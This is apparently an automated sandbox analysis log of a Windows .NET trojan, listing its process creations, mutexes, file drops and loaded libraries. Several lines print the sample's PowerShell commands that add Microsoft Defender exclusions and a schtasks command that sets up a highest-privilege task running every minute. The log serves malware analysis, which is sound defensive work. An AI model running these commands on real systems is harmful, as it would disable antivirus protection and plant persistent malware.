Source: 0720XW.0.dr, T8OeMrVcLjImLRIolSzxRmx4be.cs Base64 encoded string: 'TFbA2nhOqXhoA73fG8a5dOFln337an8NKCsvOHCcJJ18u1DDcv2wzZNNPqQq0PGDAxGs4TQU1yxg', 'QYmrSQgddbPlLLg3QKk1A7Q5tWEegKXrjJS4v57gkJ7DC7JlFphN3ZteJGcdkuTAw58W0tXqOVes', 'iS16qM0NJIZEBuAzFuHT6eV3lIyQsgvBim5hMLBlO9v8RMA6zcqFZJac9ALKHjmVwnpi77YcRAcu', 'm5yO9k7XaSllATXq6wVy6AH8dABHQUzn5DdDsYRaJrCtZy7yn6C1KeQIvH7MQUMhQxvH2S57nNDX'
Source: 0720XW.0.dr, vZUlsyOu66ldYM7KSeC9Zrr9Tp.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0720XW.0.dr, vZUlsyOu66ldYM7KSeC9Zrr9Tp.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Or3dzp4vB1.exe, vZUlsyOu66ldYM7KSeC9Zrr9Tp.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Or3dzp4vB1.exe, vZUlsyOu66ldYM7KSeC9Zrr9Tp.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.evad.winEXE@21/25@1/3
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File created: C:\Users\user\AppData\Roaming\0720XW Jump to behavior
Source: C:\Users\user\AppData\Roaming\0720XW Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
Source: C:\Windows\System32\OpenWith.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Mutant created: \Sessions\1\BaseNamedObjects\08ByrZd1ARUvRLdE
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3540:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_03
Source: C:\Windows\System32\OpenWith.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6516:120:WilError_03
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File created: C:\Users\user\AppData\Local\Temp\Log.tmp Jump to behavior
Source: Or3dzp4vB1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Or3dzp4vB1.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Or3dzp4vB1.exe ReversingLabs: Detection: 84%
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File read: C:\Users\user\Desktop\Or3dzp4vB1.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Or3dzp4vB1.exe "C:\Users\user\Desktop\Or3dzp4vB1.exe"
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Or3dzp4vB1.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\0720XW'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '0720XW'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "0720XW" /tr "C:\Users\user\AppData\Roaming\0720XW"
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\0720XW C:\Users\user\AppData\Roaming\0720XW
Source: unknown Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
Source: unknown Process created: C:\Users\user\AppData\Roaming\0720XW C:\Users\user\AppData\Roaming\0720XW
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Or3dzp4vB1.exe' Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Or3dzp4vB1.exe' Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\0720XW' Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '0720XW' Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "0720XW" /tr "C:\Users\user\AppData\Roaming\0720XW" Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
